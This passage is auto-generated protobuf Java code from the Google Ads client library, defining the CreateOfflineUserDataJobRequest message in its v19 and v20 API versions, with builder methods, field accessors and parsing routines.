com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * Request message for * [OfflineUserDataJobService.CreateOfflineUserDataJob][google.ads.googleads.v19.services.OfflineUserDataJobService.CreateOfflineUserDataJob]. * </pre> * * Protobuf type {@code google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest) com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v19.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v19_services_CreateOfflineUserDataJobRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v19.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v19_services_CreateOfflineUserDataJobRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest.class, com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest.Builder.class); } // Construct using com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3 .alwaysUseFieldBuilders) { getJobFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; customerId_ = ""; job_ = null; if (jobBuilder_ != null) { jobBuilder_.dispose(); jobBuilder_ = null; } validateOnly_ = false; enableMatchRateRangePreview_ = false; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v19.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v19_services_CreateOfflineUserDataJobRequest_descriptor; } @java.lang.Override public com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest getDefaultInstanceForType() { return com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest build() { com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest buildPartial() { com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest result = new com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.customerId_ = customerId_; } int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000002) != 0)) { result.job_ = jobBuilder_ == null ? job_ : jobBuilder_.build(); to_bitField0_ |= 0x00000001; } if (((from_bitField0_ & 0x00000004) != 0)) { result.validateOnly_ = validateOnly_; } if (((from_bitField0_ & 0x00000008) != 0)) { result.enableMatchRateRangePreview_ = enableMatchRateRangePreview_; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest) { return mergeFrom((com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest other) { if (other == com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest.getDefaultInstance()) return this; if (!other.getCustomerId().isEmpty()) { customerId_ = other.customerId_; bitField0_ |= 0x00000001; onChanged(); } if (other.hasJob()) { mergeJob(other.getJob()); } if (other.getValidateOnly() != false) { setValidateOnly(other.getValidateOnly()); } if (other.getEnableMatchRateRangePreview() != false) { setEnableMatchRateRangePreview(other.getEnableMatchRateRangePreview()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { customerId_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { input.readMessage( getJobFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000002; break; } // case 18 case 24: { validateOnly_ = input.readBool(); bitField0_ |= 0x00000004; break; } // case 24 case 40: { enableMatchRateRangePreview_ = input.readBool(); bitField0_ |= 0x00000008; break; } // case 40 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object customerId_ = ""; /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The customerId. */ public java.lang.String getCustomerId() { java.lang.Object ref = customerId_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); customerId_ = s; return s; } else { return (java.lang.String) ref; } } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The bytes for customerId. */ public com.google.protobuf.ByteString getCustomerIdBytes() { java.lang.Object ref = customerId_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); customerId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @param value The customerId to set. * @return This builder for chaining. */ public Builder setCustomerId( java.lang.String value) { if (value == null) { throw new NullPointerException(); } customerId_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return This builder for chaining. */ public Builder clearCustomerId() { customerId_ = getDefaultInstance().getCustomerId(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @param value The bytes for customerId to set. * @return This builder for chaining. */ public Builder setCustomerIdBytes( com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); customerId_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private com.google.ads.googleads.v19.resources.OfflineUserDataJob job_; private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.OfflineUserDataJob, com.google.ads.googleads.v19.resources.OfflineUserDataJob.Builder, com.google.ads.googleads.v19.resources.OfflineUserDataJobOrBuilder> jobBuilder_; /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return Whether the job field is set. */ public boolean hasJob() { return ((bitField0_ & 0x00000002) != 0); } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return The job. */ public com.google.ads.googleads.v19.resources.OfflineUserDataJob getJob() { if (jobBuilder_ == null) { return job_ == null ? com.google.ads.googleads.v19.resources.OfflineUserDataJob.getDefaultInstance() : job_; } else { return jobBuilder_.getMessage(); } } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder setJob(com.google.ads.googleads.v19.resources.OfflineUserDataJob value) { if (jobBuilder_ == null) { if (value == null) { throw new NullPointerException(); } job_ = value; } else { jobBuilder_.setMessage(value); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder setJob( com.google.ads.googleads.v19.resources.OfflineUserDataJob.Builder builderForValue) { if (jobBuilder_ == null) { job_ = builderForValue.build(); } else { jobBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder mergeJob(com.google.ads.googleads.v19.resources.OfflineUserDataJob value) { if (jobBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0) && job_ != null && job_ != com.google.ads.googleads.v19.resources.OfflineUserDataJob.getDefaultInstance()) { getJobBuilder().mergeFrom(value); } else { job_ = value; } } else { jobBuilder_.mergeFrom(value); } if (job_ != null) { bitField0_ |= 0x00000002; onChanged(); } return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder clearJob() { bitField0_ = (bitField0_ & ~0x00000002); job_ = null; if (jobBuilder_ != null) { jobBuilder_.dispose(); jobBuilder_ = null; } onChanged(); return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public com.google.ads.googleads.v19.resources.OfflineUserDataJob.Builder getJobBuilder() { bitField0_ |= 0x00000002; onChanged(); return getJobFieldBuilder().getBuilder(); } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public com.google.ads.googleads.v19.resources.OfflineUserDataJobOrBuilder getJobOrBuilder() { if (jobBuilder_ != null) { return jobBuilder_.getMessageOrBuilder(); } else { return job_ == null ? com.google.ads.googleads.v19.resources.OfflineUserDataJob.getDefaultInstance() : job_; } } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.OfflineUserDataJob, com.google.ads.googleads.v19.resources.OfflineUserDataJob.Builder, com.google.ads.googleads.v19.resources.OfflineUserDataJobOrBuilder> getJobFieldBuilder() { if (jobBuilder_ == null) { jobBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.OfflineUserDataJob, com.google.ads.googleads.v19.resources.OfflineUserDataJob.Builder, com.google.ads.googleads.v19.resources.OfflineUserDataJobOrBuilder>( getJob(), getParentForChildren(), isClean()); job_ = null; } return jobBuilder_; } private boolean validateOnly_ ; /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @return The validateOnly. */ @java.lang.Override public boolean getValidateOnly() { return validateOnly_; } /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @param value The validateOnly to set. * @return This builder for chaining. */ public Builder setValidateOnly(boolean value) { validateOnly_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @return This builder for chaining. */ public Builder clearValidateOnly() { bitField0_ = (bitField0_ & ~0x00000004); validateOnly_ = false; onChanged(); return this; } private boolean enableMatchRateRangePreview_ ; /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @return The enableMatchRateRangePreview. */ @java.lang.Override public boolean getEnableMatchRateRangePreview() { return enableMatchRateRangePreview_; } /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @param value The enableMatchRateRangePreview to set. * @return This builder for chaining. */ public Builder setEnableMatchRateRangePreview(boolean value) { enableMatchRateRangePreview_ = value; bitField0_ |= 0x00000008; onChanged(); return this; } /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @return This builder for chaining. */ public Builder clearEnableMatchRateRangePreview() { bitField0_ = (bitField0_ & ~0x00000008); enableMatchRateRangePreview_ = false; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest) private static final com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest(); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CreateOfflineUserDataJobRequest> PARSER = new com.google.protobuf.AbstractParser<CreateOfflineUserDataJobRequest>() { @java.lang.Override public CreateOfflineUserDataJobRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CreateOfflineUserDataJobRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CreateOfflineUserDataJobRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleads/google-ads-java
35,977
google-ads-stubs-v20/src/main/java/com/google/ads/googleads/v20/services/CreateOfflineUserDataJobRequest.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v20/services/offline_user_data_job_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v20.services; /** * <pre> * Request message for * [OfflineUserDataJobService.CreateOfflineUserDataJob][google.ads.googleads.v20.services.OfflineUserDataJobService.CreateOfflineUserDataJob]. * </pre> * * Protobuf type {@code google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest} */ public final class CreateOfflineUserDataJobRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest) CreateOfflineUserDataJobRequestOrBuilder { private static final long serialVersionUID = 0L; // Use CreateOfflineUserDataJobRequest.newBuilder() to construct. private CreateOfflineUserDataJobRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CreateOfflineUserDataJobRequest() { customerId_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new CreateOfflineUserDataJobRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v20.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v20_services_CreateOfflineUserDataJobRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v20.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v20_services_CreateOfflineUserDataJobRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest.class, com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest.Builder.class); } private int bitField0_; public static final int CUSTOMER_ID_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object customerId_ = ""; /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The customerId. */ @java.lang.Override public java.lang.String getCustomerId() { java.lang.Object ref = customerId_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); customerId_ = s; return s; } } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The bytes for customerId. */ @java.lang.Override public com.google.protobuf.ByteString getCustomerIdBytes() { java.lang.Object ref = customerId_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); customerId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int JOB_FIELD_NUMBER = 2; private com.google.ads.googleads.v20.resources.OfflineUserDataJob job_; /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return Whether the job field is set. */ @java.lang.Override public boolean hasJob() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return The job. */ @java.lang.Override public com.google.ads.googleads.v20.resources.OfflineUserDataJob getJob() { return job_ == null ? com.google.ads.googleads.v20.resources.OfflineUserDataJob.getDefaultInstance() : job_; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ @java.lang.Override public com.google.ads.googleads.v20.resources.OfflineUserDataJobOrBuilder getJobOrBuilder() { return job_ == null ? com.google.ads.googleads.v20.resources.OfflineUserDataJob.getDefaultInstance() : job_; } public static final int VALIDATE_ONLY_FIELD_NUMBER = 3; private boolean validateOnly_ = false; /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @return The validateOnly. */ @java.lang.Override public boolean getValidateOnly() { return validateOnly_; } public static final int ENABLE_MATCH_RATE_RANGE_PREVIEW_FIELD_NUMBER = 5; private boolean enableMatchRateRangePreview_ = false; /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @return The enableMatchRateRangePreview. */ @java.lang.Override public boolean getEnableMatchRateRangePreview() { return enableMatchRateRangePreview_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(customerId_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, customerId_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getJob()); } if (validateOnly_ != false) { output.writeBool(3, validateOnly_); } if (enableMatchRateRangePreview_ != false) { output.writeBool(5, enableMatchRateRangePreview_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(customerId_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, customerId_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(2, getJob()); } if (validateOnly_ != false) { size += com.google.protobuf.CodedOutputStream .computeBoolSize(3, validateOnly_); } if (enableMatchRateRangePreview_ != false) { size += com.google.protobuf.CodedOutputStream .computeBoolSize(5, enableMatchRateRangePreview_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest)) { return super.equals(obj); } com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest other = (com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest) obj; if (!getCustomerId() .equals(other.getCustomerId())) return false; if (hasJob() != other.hasJob()) return false; if (hasJob()) { if (!getJob() .equals(other.getJob())) return false; } if (getValidateOnly() != other.getValidateOnly()) return false; if (getEnableMatchRateRangePreview() != other.getEnableMatchRateRangePreview()) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + CUSTOMER_ID_FIELD_NUMBER; hash = (53 * hash) + getCustomerId().hashCode(); if (hasJob()) { hash = (37 * hash) + JOB_FIELD_NUMBER; hash = (53 * hash) + getJob().hashCode(); } hash = (37 * hash) + VALIDATE_ONLY_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean( getValidateOnly()); hash = (37 * hash) + ENABLE_MATCH_RATE_RANGE_PREVIEW_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean( getEnableMatchRateRangePreview()); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * Request message for * 